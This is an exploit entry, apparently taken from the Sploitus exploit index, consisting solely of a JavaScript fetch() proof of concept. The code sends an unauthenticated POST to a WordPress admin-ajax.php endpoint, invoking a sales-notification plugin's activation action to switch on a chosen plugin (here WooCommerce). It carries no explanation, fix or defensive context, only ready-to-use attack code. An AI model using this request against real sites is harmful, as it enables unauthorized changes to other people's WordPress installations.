## https://sploitus.com/exploit?id=WPEX-ID:356C89A1-81B6-4600-9291-1A74788AF7F9
fetch('https://example.com/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=wcsalesnotification_ajax_plugin_activation&location=woocommerce/woocommerce.php',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));